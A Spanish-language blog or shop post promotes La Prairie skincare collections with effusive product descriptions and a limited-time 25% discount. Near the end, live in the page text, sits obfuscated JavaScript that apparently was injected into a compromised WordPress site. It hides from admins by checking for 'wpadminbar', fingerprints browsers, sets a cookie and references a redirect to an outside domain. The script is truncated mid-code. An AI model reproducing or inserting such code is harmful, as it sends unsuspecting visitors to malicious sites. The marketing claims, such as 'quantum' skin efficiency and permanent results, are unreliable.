LaPrairie-Caviar_11

La Prairie es una marca Suiza reconocida por sus laboriosas técnicas y sus años de investigación. Todo comenzó en la que fue el hogar de la Clínica La Prairie junto a las antiguas orillas del lago Leman, en la cual un brillante doctor creyó que la ciencia podría algún día desvelar el secreto de la eterna juventud.

 La Prairie siempre ha trabajado con el objetivo  de recuperar y prolongar la salud y la vitalidad de la piel, sus ideas revolucionarias y tan efectivas se han convertido en un secreto de culto, desde sus origenes en los círculos de la nobleza, realeza y celebridades hasta la actualidad. Ya en su momento La Clínica La Prairie se convirtió en un inmaculado santuario de rejuvecimiento, actualmente sus tratamientos de cabina consiguen hacernos sentir que el tiempo se ha detenido.

La Prairie va más allá del cuidado diario de la piel para detener el envejecimiento en su origen sus cremas, serums, líneas de cuidado de la piel y tratamientos celulares actúan con un sofisticación y resultados muy efectivos.

Los productos de La Prairie se dividen en colecciones que deberemos elegir según nuestras necesidades:

  • The Platinum Collection: ayuda a transformar los principales signos visibles de envejecimiento. La piel resiste al envejecimiento y funciona a niveles cuánticos de eficiencia. La hidratación se repone continuamente. Su fórmula con infusión de platino proporciona un toque suave y aterciopelado que se fusiona exquisitamente con la piel y deja una apariencia de esplendor suave sin igual. El cerebro registra una experiencia de placer, que ayuda al rejuvenecimiento definitivo.

platinum

  • The Skin Caviar Collection: Ideal si lo que buscamos es realzar y reafirmar nuestra piel. A través de los extractos puros de skin caviar potencia los contornos naturales y mejora en gran medida el aspecto de elasticidad y el tono de la piel. Las proteínas exclusivas crean una suavidad satinada legendaria.

skin-caviar_m2-collection-dlp_hero4_1280

  • The White Caviar Collection: Los excepcionales beneficios reafirmantes e iluminadores se potencian con los extractos de caviar dorado, cristales líquidos y nacarados para conseguir una delicada luminosidad. El tono irregular se difumina y la piel luce un aspecto más firme. Ideal para como tratamiento antimanchas y pieles apagadas.

La-Prairie

  • The Radiance Collection: los extraordinarios ingredientes de oro revitalizan y perfeccionan la apariencia de una piel perfecta hasta conseguir una textura, un tono y una luminosidad radiante. Al instante y para siempre, la infusión de oro recupera la luminosidad juvenil de la piel. Ideal para revitalizar la piel y perfeccionar la textura de la piel.

the_radiance_collection_collection-dp-t2-gl-400

  • The Cellular Swiss Ice Crystal Collection: Concebida basada en los secretos que han sobrevivido a las condiciones más duras de la Tierra combaten los primeros signos de envejecimiento. De un mundo de cristales de hielo proviene la belleza que resiste el paso del tiempo. La piel cansada, apagada, seca y con primeras arrugas desaparece. El resultado es una piel con un aspecto más joven, firme y con vitalidad. Ideal para combatir contra los primeros signos del envejecimiento.

La_Prairie_cellular_swiss_ice_crystal_collection_p

  • The Antiaging Collection: Algunas líneas de expresión denotan personalidad. Las arrugas profundas solo denotan años. Este tratamiento antienvejecimiento se ha creado especialmente para actuar en profundidad y ayudar a combatir las arrugas desde su origen.

LA-PRAIRIE-anti-aging-rapid-response-booster-2

  • The Cellular Power Collection: Recargue la energía de la piel desde el origen. Purifique y renueve la apariencia de la piel, inicie el dinamismo y reavive la vitalidad para conseguir un nuevo nivel de eficacia antienvejecimiento. Una línea energizante y purificadora.

la-prairie-Cellular-Power-Collection-set

  • The Swiss Moisture Collection: Baña tu piel con una infusión altamente hidratante, con protectores nutrientes de plantas de efecto calmante.

the_swiss_cellular_moisture_collection_collection-dp-h1-es_ES-1024

Esta semana podréis encontrar precios especiales en todos los productos de La Prairie disfrutando de un 25% de Descuento hasta el 5 de Abril.

Consulta a nuestra consejera de belleza y elige el tratamiento de La Prairie que mejor se adecue a tus necesidades.

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone